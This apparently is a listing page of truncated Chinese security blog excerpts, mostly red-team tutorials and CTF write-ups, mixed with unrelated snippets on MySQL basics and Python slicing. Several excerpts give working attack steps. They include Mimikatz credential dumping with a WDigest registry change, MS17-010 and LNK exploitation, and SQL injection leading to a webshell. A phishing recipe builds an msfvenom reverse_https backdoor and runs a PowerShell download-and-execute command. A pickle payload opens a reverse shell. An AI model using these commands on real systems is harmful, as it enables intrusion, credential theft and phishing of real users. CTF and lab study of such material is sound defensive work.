红队攻击面相关讨论

一. Mimikatz加修改注册表绕过LSA保护(暂不考虑EDR和WD)Mimikatz原理：Mimikatz通过逆向获取存储在lsass.exe进程中的明文登录密码。(lsass.exe用于本地安全和登陆策略)。首先使用Mimikatz抓取时必须是管理员权限，在win10，win11，win2012等版本中，系统会开启LSA保护，明文密码字段会显示null。第一步提权：privilege::debug第二步抓取：sekurlsa::logonPasswords关闭LSA保护：管理员权限对注册表进行修改，随后使用脚本或者任意方法重启系统，使受害机的管理员重新登陆，此次登录的明文密码将会保存在lsass.exe 进程中，使用Mimikatz再次抓取可显示明文密码。若恢复注册表可直接将1改为0。修改命令：reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f二. Procdump dump绕过360，火狐绕过思路：由于Mimikatz的强大，各大EDR已经在防护Mimikatz的道路上越走越远，所以我们如果 针对Mimikatz做免杀哪怕过静态，还要考虑各种姿势绕过抓取hash的动作，但是这无疑需要很多的时间，因此我们可以考虑取出已经存储在lsass.exe的明文密码，通过本地的Mimikatz进行处理得到密码。实施：前提已经关闭LSA保护并且为管理员权限，使用微软项目P…

0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞，通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。 Moonraker: 1镜像下载地址： http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA 0x02 信息收集 1.存活主机扫描 root@kali2018:/# arp-scan -l 发现192.168.1.10是目标靶机系统 2.端口扫描 namp扫描目标靶机端口 root@kali2018:~# nmap -p - -A 192.168.1.10 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) | 256 53:59:87:…

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb …

0x01 前言 MS17-010 的psexec是针对Microsoft Windows的两款最受欢迎的漏洞进行攻击。 CVE-2017-0146（EternalChampion / EternalSynergy） - 利用事务请求利用竞争条件 CVE-2017-0143（EternalRomance / EternalSynergy） - 利用WriteAndX和Transaction请求之间的类型混淆 与EternalBlue相比，此模块具有高可靠性和优先级，其中管道名可用于匿名登录（通常，Vista之前的所有内容以及野外域计算机相对常见）。 0x02 利用条件 为了能够使用exploit/windows/smb/ms17_010_psexec： 您可以任意使用有效的用户名和密码绕过这些大部门要求 1.防火墙必须允许SMB流量出入 2.目标必须使用SMBv1协议 3.目标必须缺少MS17-010补丁 4.目标必须允许匿名IPC $和管道名 您可以使用SMB MS17-010和Pipe Auditor辅助扫描模块检查所有这些。 0x03 选项 NAMEDPIPE选项 ----必选 默认情况下，模块将扫描任何可用管道的公共管道列表，您可以按名称指定一个管道名 LEAKATTEMPTS选项---可选 被用来确保漏洞的稳定性 DBGTRACE选项---可选，建议设置为1 用于调试，提供非常详细的信息 SMBUser选项---可选，需要在win10以上设置 一个有效的Windows用户名 SMBPa…

0x01 前言 RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时，用户权限较少的账户相较管理员权限的用户受到的影响更小。 攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制，文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件，打开此驱动器 （或远程共享） 时，恶意文件就会在目标系统上执行攻击者的代码。 0x02 漏洞环境搭建与利用 漏洞环境搭建： kalix86 192.168.1.109 攻击机 windows7x64 192.168.1.101 目标靶机 漏洞利用： 1.kali主机下载cve_2017_8464_lnk_rce.rb： cd /opt wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb 2.将cve_2017_8464_lnk_rce.rb拷贝到 /usr/share/metasploit-framework/modules/exploit/windows/smb/目录下： cp cve_2017_8464_lnk_rce.rb /usr/share/me…

前言 本文主要通过一个案例来演示一下当MSSQL是DBA权限，且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。 我测试的环境是在Win7 64位下，数据库是SQLServer 2000，IIS版本是7.5，程序是采用风讯的CMS。后台登录后有多处注入，因为这里是演示用注入获取WEBSHELL，因此就不考虑后台上传的情况了，只是用注入来实现。 过程 首先找到一个如下的注入点： http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;-- 通过SQLMAP可以查看到是DBA权限 创建临时表 http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));-- 在WINDOWS下查找文件用如下命令： for /r 目录名:\ %i in (匹配模式) do @echo %i 例如在C盘下搜索NewsList.aspx，可以使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i 使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索结果 一定要在匹配模式里面加上一个*号，不然搜…

概述 如果MSSQL数据库中开启了MSSQL Server Agent Job服务的话，攻击者将可以利用MSSQL Server中自带的功能来获取一个shell。 SQL Server Agent SQL Server Agent是一个Windows服务，它可以用来执行自动化任务。 攻击浅析 利用MSSQL Server中的本地功能来在Windows操作系统中执行任意命令。在整个测试过程中，xp_cmdshell存储过程已被禁用了，并且限制了创建自定义存储过程的能力。 当xp_cmdshell扩展存储过程在攻击中被使用时，大多数安全监控或检测系统都会产生警报。而攻击者和渗透测试人员对xp_cmdshell的滥用已经导致很多组织和企业开始禁用或限制xp_cmdshell了。 可利用MSSQL Server代理来在目标数据库服务器中执行任意控制命令。但是，目标服务器必须满足一下几个条件： 目标服务器必须开启了MSSQL Server代理服务； 服务器中当前运行的用户账号必须拥有足够的权限去创建并执行代理作业； 两个可以利用的MSSQL代理作业子系统：CmdExec和PowerShell子系统，这两个功能可以分别用来执行操作系统命令和PowerShell脚本。 http://rinige.com/usr/uploads/2016/10/4246109187.png 可以使用SQL注入点来创建并执行代理任务。任务所需执行的命令是一段PowerShell代码，这段代码可以让目标系统与一个受Optiv控制的IP地址进行通信连接，然后…

0x00 前言 在本文中，我们将处理一个很长时间以来一直待解决的问题：MSSQL Rootkit。到目前为止，针对MS-SQL所描述的大多数命令执行都是调用“ xp_cmdshell ”和“ sp_OACreate ”存储过程的。因此，如果在没有xp_cmdshell和sp_OACreate存储过程的MSSQL服务器上拥有“ sa ”帐户或任何具有“ sysadmin ”权限的用户帐户，我们是否将停止渗透该系统? 当然，我们不应该放弃。在本文中将介绍如何获取具"xp_cmdshell”，“ sp_OACreate”，“ sp_OAMethod”的sysadmin权限的帐户. WarSQLKit Github: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit 此工具用于捕获具有“系统管理员权限”和“ xp_cmdshell”，“ sp_OACreate”，“ sp_OAMethod”等权限的帐户。 WarSQLKit命令示例： EXEC sp_cmdExec 'whoami'; => Any Windows command EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\SYSTEM rights EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv…

一· 1.社区版mysql官方地址 http://dev.mysql.com/downloads/windows/installer/8.0.html 2.phpstudy一定要关了里面集成有mysql 3.命令行（管理员） 启动 net start mysql80 关闭 net stop mysql80 命令行（非管理员 连接数据库 mysql [-h 127.0.0.1] [-P 3306] -u root -p 4.mysql 1.关系型数据库：通过表来存储数据的数据库 \非关系型数据库：不通过表来存储数据的数据库 2.数据模型：客户端——DBMS——数据库（多个—–表（存放数据）（多个 二· 1.通用语法 1.sql语句可单行或多行，以分号结尾。 2.可用空格或缩进来增强可读性 3.mysql数据库不区分大小写（关键字建议用大写 4.单行注释（ –或者# ） 多行注释（ /*内容*/ ） 2.sql分类 1.DDL(data definition language)数据定义语言,用来定义数据库对象(数据库，表，字段) 2.DML(data manipulation language)数据操作语言，用来对数据库中的数据进行曾删改 3.…

关于Mysql蜜罐的具体技术细节，网上文章介绍的太多了，大家可以自己从网上搜索文章，我写一个简介吧：mysql中有一个load data local infile函数能够读取本地文件到mysql数据库中。当攻击者用爆破mysql密码的扫描器扫描到我们的mysql并连接上的时候（注，这里我纠正一下，只要连接一下蜜罐mysql，就可以被蜜罐读取到本地配置文件，不需要提供正确的用户名密码），客户端（攻击者）会自动发起一个查询，我们（服务端）会给与一个回应，我们在回应的数据包中加入load data local infile读取攻击者的本地文件到我们数据库中，达到反制的目的。（以下图片来源于网络搜索） cs的配置文件明文存储密码只要是使用cs客户端连接过cs服务端的电脑，cs客户端都会在固定的文件夹下生成一个.aggressor.prop配置文件。如果是Windows系统，那么文件位置是：C:\Users\Administrator\.aggressor.prop，这个配置文件里面就包含了cs远控的ip地址、端口、用户名及密码，而且都是明文的！如下图所示： 每次打开cs都会显示出曾经登录后的ip地址、端口、用户名、密码等信息，这些信息都是存储在本地.aggressor.prop文件中的，大致内容如下图所示： 因此我们得到结论，搭建一个mysql蜜罐，一旦攻击者连接这个蜜罐，那么这个蜜罐利用msyql本地文件读取漏洞去自动读取C:\Users\Administrator\.aggressor.prop这个文件内容，蜜罐就可以成功得到攻…

1.calc 题目地址：http://116.205.139.166:8001/ 右键 /source 源码 @app.route("/calc",methods=['GET']) def calc(): ip = request.remote_addr num = request.values.get("num") log = "echo {0}{1}{2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num) if waf(num): try: data = eval(num) os.system(log) except: pass return str(data) else: return "waf!!" flask 报错可以看到 waf 的过滤规则 http://162.14.110.241:8050/calc?num[]= def waf(s): blacklist = ['import','(',')','#','@','^','$',',','>','?','`',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclass…

decompress压缩包套娃，一直解到最后一层，将文件提取出来 提示给出了一个正则，按照正则爆破密码，一共五位，第四位是数字 ^([a-z]){3}\d[a-z]$一共就五位数，直接ARCHPR爆破，得到密码 xtr4m，解压得到flag pleasingMusic题目描述中提到： 一首歌可以好听到正反都好听 根据提示（其实也能听出来后半段音乐是倒放出来的）将音频进行反向处理实现倒放，再解析其中的摩斯电码（Morse Code）。 可以手动翻译摩斯电码表，也可以使用在线解码。 粗的表示：-，细的表示：.间隔或者空格：用空格或者/分割 WhereIsFlag纯命令手工查找，找到真正的 flag 在 /proc/self/environ 文件（可用于获取当前进程的环境变量）内，只要执行下面的命令就能拿到 flag. cat /proc/self/environ Labyirinth 兑换码 wireshark_checkin wireshark_secret 联系题目描述，找到提瓦特文字对照表 对照表解出了很多东西 我一开始一直试的中间的那串大的，但是大小写都不对 后面继续解密四周小的密文，得到：FLAGISASENTENCE IIAAELGTSFKFA DOYOUKNOWFENCE MESIOAABGNHNSGOGMYEIADE 提示 flag 是一句话，还有 FENCE 也就是栅栏加密MESIOAABGNHNSGOGMYEIADE https://ctf.bugku.com/tool/ra…

0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库，可以用来存储和分发Maven，NuGET等软件源仓库。其3.14.0及之前版本中，存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能，而这处功能存在未授权访问漏洞，将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告，在Nexus Repository Manager 3中由于存在访问控制措施的不足，未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码，从而达到远程代码执行的目的。 0x01 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本 0x02 漏洞概述 从官方的漏洞简述来看简单的来说就是由于未授权访问的用户可以构造请求而造成任意代码执行。而且因为3.15.0+以上的版本增加了用户认证，所以3.15.0+的版本不受此漏洞的影响。所以根据diff的结果，可以大致的确定漏洞在org.sonatype.nexus.coreui.ComponentComponent#previewAssets： 0x03 整体触发流程 ExtDirectModule$configure:60 # 路由绑定与请求解析 ExtDirectServlet$doPost:155 # 处理post请求 DirectJNgineServlet$doPost:595 # 根据不同的Content-Type来解析请求 DirectJNgin…

前言 NSSCTF最终排名为37名 参赛队员有:Godyu lemon biu801 本篇文章由Godyu lemon biu801共同参与编写 赛状惨烈 重在参与 最后的becomeroot想用CVE2021-3493打,出题人后来单独开了个靶机,没打出来 温馨的酒吧 这是一道视频互动题，flag藏在不同的视频结尾 flag1： 沉默->好啊->唉，看看题吧->web->放下比赛，安慰对象->flag1 flag2 看看菜单->select * from flag->flag2 不过前面是占位符 flag3 谢队我要给你决斗->突然不想打了，快跑->flag3 拼接起来最终flag是 NSSCTF{新年快乐_不要停下来啊_CTFer} Number7 根据Number7 而且inside NO.7猜测cisco type7加密 使用在线网站或者随波主流都能解开 usersssssssss 下载完毕后是200个账号 密码是md5sum 一行和一行对应 sh脚本 #!/bin/bash # 定义文件路径 input="/CVE/wordlist.txt" output="/CVE/4.txt" # 重置输出文件 > "$output" #…

一、脚本的语法格式 大小写敏感 缩进：使用缩进表示层级关系,YAML 使用空格进行缩进，通常每个缩进级别为两个空格。 键值对：YAML 通过键值对来存储数据，键和值之间用冒号 : 分隔。 列表：使用短横线 -来表示列表中的项。 注释：以 # 开头的行是注释。 字符串：字符串可以不使用引号，也可以使用单引号或双引号 id不能有中文、特殊字符、--以及空格等内容，id这个参数，您可以理解为是输出的标题，一个简单易懂的ID，可以让您更快的判断出 info：信息块，名称 、 作者 、 严重性 、 描述 、参考和 标签 ，这些都属于信息块的范围，一般情况下，我们只需要写入名称、作者、严重性、描述、标签这几项即可 name：模板名称，这个建议跟id相同即可 severity：严重性，这里不可以使用中文，一般用critical、hight、Medium、info来表示威胁等级 description：漏洞介绍，这里可以使用中文，也不限制特殊字符，一般是用来做漏洞介绍用的，可以方便使用者了解该漏洞的具体说明 tags：标签，是为了给漏洞加一个标签，方便进行统一扫描，例如：tags: seeyon(切记不要用中文哈) 日常编写nuclei的yaml脚本，nuclei内置cookie-reuse属性，在发起多个请求时,需要保持会话,可以添加cookie-reuse: true来保持多个请求时会话得到保持,这在有身份验证时很有用。 如果匹配失败的话可以使用-debug来获取请求包和返回包进行调试，使用Burp抓包直接将请求包内容粘贴即可 二、Nucl…

0x00 前言 SSL VPN虽然可以保护企业资产免受互联网被攻击的风险影响，但如果SSL VPN本身容易受到攻击呢？它们暴露在互联网上，可以可靠并安全地连接到内网中。一旦SSL VPN服务器遭到入侵，攻击者就可以渗透到内网，甚至接管所有连接到ssl-vpn服务器的用户！由于其重要性，在过去几个月中，我们开始对安全领先的SSL VPN产品进行安全研究。 我们计划用3篇文章上发布我们的结果。我们把本文作为第一篇，因为我们认为这是一个有趣的故事，非常适合作为我们Black Hat USA and DEFCON 的彩头： 像NSA一样渗透企业内网 - 在安全领先的SSL VPN上执行RCE 不要担心破坏者，这个故事不包含在我们的BHUSA / DEFCON会议中。 在我们即将到来的演示中，我们将提供更多的核心利用和疯狂的bug链，来入侵您的SSL VPN。从我们如何越狱设备以及我们关注的攻击向量来看。我们还将演示从唯一暴露的HTTPS端口获取root shell，隐蔽地将服务器武器化以对抗其所有者，并滥用隐藏功能来接管所有VPN客户端！所以请期待它;） 0x01 故事开头 在本文中，我们将讨论Palo Alto SSL VPN上的漏洞。Palo Alto称他们的SSL VPN产品为GlobalProtect。您可以通过302重定向到/global-protect/login.esp Web根目录轻松识别GlobalPortect服务！ 关于此漏洞，我们在红队评估服务期间意外发现了该漏洞。起初，我们以为这是0day。但是，…

NKCTF cve复现详细链接 https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ 打比赛时也找到了这篇文章,当时用的nc和sh反弹shell失败,遂炸裂,百思不得其解,赛后复盘失败原因 解决办法:用python shell命令弹(感谢出题人seizer,感谢晨曦师傅指点, ->晨曦师傅的博客https://chenxi9981.github.io/ 复现过程 在这篇文章当中linux提到必须有账号密码 比赛的时是用的linux环境, 比赛登录账号是：[email protected] 密码猜测是：tacooooo 从这场比赛中我又坚定了密码不一定是弱密码,有可能与出题人的相关的这种情况 登录 根据提示进行下一步上传文件 上传文件所需要的python文件如下 exp： import pickle import os import pickletools class exp(): def __reduce__(self): return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_…

引进序列化 以下为个人笔记 认识各类型序列化后的样子 序列化（Serialization）是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间，对 象将其当前状态写入到临时或持久性存储区。以后，可以通过从存储区中读取或反序列化对象的状态， 重新创建该对象。 相关函数 serialize() 序列化 函数用于序列化对象或数组，并返回一个字符串。序列化对象后，可以很方便的将它传递给其他需要它 的地方，且其类型和结构不会改变。如果想要将已序列化的字符串变回 PHP 的值，可使用 unserialize() 演示代码： <?php> $str1="godyu521"; #定义字符串的序列化 $num=20240203; #定义数字的序列化 $test_bool=True;#定义布尔值的序列化 $str3=array("shenyu",1,"godyu"); #定义数组的序列化 $str2=serialize($str1); print serialize($num)."\n"; print serialize($test_bool)."\n"; echo $str2."\n"; echo serialize($str3)."\n"; class Godyu{ public $test="phpserialize"; #定义对象的序列化 public $test2="study"; function g(){ …

前言 继续学习吧,希望我们能一起学习,在家好蔫, 本篇文章主要主要讲的是靶场的PHP反序列化的一些题 复习一下魔术方法 __construct() 当一个对象创建的时候被调用 _ _destruct() 当一个对象销毁的时候被调用 __toString() 当一个对象被当作字符串使用的时候被调用 __invoke 当尝试以调用函数的方式调用一个 对象时，会被调用 __sleep() 当对象在被序列化之前运行 __wakeup() 当在被反序列化之后调用 __get() 访问私有变量或不存在的变量均会触发 __set() 给私有变量或不存在的变量赋值时，会触发 __unset 对私有变量或不存在的变量调用unset时，会触发 WEB 256 与上一个题唯一不同的地方 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='godyuu'; public $isVip=True; } $user = new ctfShowUser(); $u=serialize($user); print $u."\n"; $u1=unserialize($u); print_r ($u1); ?> Web257 没有对userna…

前言 本次主要是刷题 Web 258 直接生成,会pass掉以0开头+数字的不分大小写 仔细发现一共有两处 绕过正则 $b=str_replace(':11',':+11',$a); $d=str_replace(':8',':+8',$c); exp <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function login($u,$p){ return $this->username===$u&&$this->password===$p; } public function __destruct(){ $this->class->getInfo(); } } class info{ public $user='xxxxxx'; public function getInfo(){ return $this…

前言 最近开python的re模块 那个学烦了就继续打靶 Web264 拿到index.php直接去访问message.php 构造exp index.php 接着访问message.php 如262类似 但我尝试了262的方法没法一步到位了 只能从Index.php->message.php了 运用到字符串逃逸的知识 web264->字符串逃逸 我们构造一个exp本地测试一下 <?php class message{ public $from; public $msg; public $to; public $token='user'; public function __construct($f,$m,$t){ $this->from = $f; $this->msg = $m; $this->to = $t; } } $msg = new message("1","2",'fuck'); $umsg = str_replace('fuck', 'loveU', serialize($msg)); // O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"fuck";s:5:"token";s:4:"user";} e…

1.powershell网络钓鱼脚本： https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1 2.MSF下生产一个后门文件，通过上传或者其他方式让其受害者点击 Msfvenom -p windows/meterpreter/reverse_https lhost = 192.168.1.138 lport = 4444 -f exe> /opt/bk.exe 2.通过MSF获取远程目标受害者主机的反弹shhell: msf> use multi/handler msf exploit（handler ）> set payload windows/meterpreter/reverse_https msf exploit（handler ）> set lhost 192.168.1.138 msf exploit（handler ）> set lport 4444 msf exploit（handler ）> exploit 3.powershel远程下载并执行： powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginProm…

前言 Python切片有着很广泛的应用尤其是算法里,就比如： 此时我定义了一个字符串str”woxihuanshenyu” print(str[0:-1])#输出第一个到倒数第二个所有字符 print(str[2:5])#输出第三个到第五个字符 print(str[2:])#输出第三个往后的所有字符 此时输出： 这里以图片展示了 正文 那我们就可以知道负号是倒数的意思 那么我们将切片用于数组当中 我们简单引用OJ162http://acm.zzuli.edu.cn/problem.php?id=1162作为样例来讲述切片的用法（这里解释一下python的指针其实就是对象）另外OJ只要保证结果对就行 不一定要定义他们给的函数 我们先看要求： 答案： 下面八行代码就可以成功提交OJ def f(a,n,k): a=a[-k:]+a[:-k] return a n=int(input()) a=list(map(str,input().split())) k=int(input()) a=f(a,n,k) print(*a) 输出结果： 怎么样,也不用调用任何库,简便吧,下面拓展为大家解释切片和改动一些代码让我们更能理解 先比较一下C和C++代码： C和C++的代码均引用网上的（非本人编写） 下面是C语言代码来源:https://blog.csdn.net/viv…

一、配置数据库（需要300GB以上磁盘剩余空间）下载并安装SqlServer2008R2，配置好用户名以及登录密码，如果远程连接数据库的话，需配置数据库允许远程登录（SqlServer数据库配置请自行搜索教程）下载数据库备份文件（现目前暂时不公布，需要的可私聊）解压下载的压缩包，得到数据库备份文件，恢复数据库备份文件到SqlServer（SqlServer恢复数据库恢复操作请自行搜索教程，这里的目标数据的名称可自定写入）二、搭建服务端（需要支持Nodejs的操作系统，CPU1核以上剩余内存1GB以上）下载安装Node.js环境npm全局安装webpack和webpack-dev-server1.全局安装webpack npm install webpack -g 2.全局安装webpack-dev-server npm install webpack-dev-server -g 三、配置数据库连接1.下载项目源码：https://github.com/backlion/qqgroup-visualization2.进入项目目录下3.打开db.json文件，修改其中的数据库连接信息为自己的数据库连接信息（默认的数据库连接信息是我本人的服务器上的数据库，不保证可用）db.json例子：{ "server": "服务器地址", "database": "数据库名称", "user": "请输入用户名", "password": "请输入数据库用户密码" }四、运行1.进入项目目录下 2.安装依赖 npm inst…

一、PWN1.Nullullullllu在直接给 libc_base 的情况下，一次任意地址写 \x00 。 直接修改 IO_2_1_stdin 的 _IO_buf_base 末尾为 \x00 ，那么 _IO_buf_base 就会指向 IO_2_1_stdin 的 _IO_write_base，接下来就是利用 getchar 函数触发写操作修改 IO_buf_base 为 IO_2_1_stdout ，再次利用 getchar 函数触发写操作写 apple2 进 stdout ，printf 函数执行时候会触发 appl2 get shell。 exp from pwn import * from struct import pack from ctypes import * import base64 from subprocess import run #from LibcSearcher import * from struct import pack import tty def debug(c = 0): if(c): gdb.attach(p, c) else: gdb.attach(p) pause() def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) #----------------------------…